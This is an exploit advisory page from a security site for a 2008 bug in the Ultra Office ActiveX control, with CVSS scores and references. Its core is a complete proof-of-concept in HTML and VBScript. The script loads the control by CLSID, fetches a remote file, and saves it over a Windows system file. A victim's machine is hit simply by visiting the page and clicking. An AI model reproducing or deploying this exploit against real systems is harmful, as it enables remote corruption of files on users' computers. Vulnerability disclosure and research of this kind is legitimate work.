Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

2008.09.03
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Arbitrary File Corruption url: http://www.ultrashareware.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object> <input language=VBScript type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe dim remURL remURL = "http://SomeSite.com/SomeFile.doc" test.Open remURL, True test.Save "C:\WINDOWS\_system.ini", True End Sub </script>

References:

http://www.shinnai.net/xplits/TXT_NPku7jFjRufaz85U6Lxn.html
http://www.shinnai.net/index.php?mod=02_Forum&group=Security&argument=Remote_performed_exploits&topic=1219827906.ff.php
http://www.securityfocus.com/bid/30863
http://www.milw0rm.com/exploits/6319
http://secunia.com/advisories/31632


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top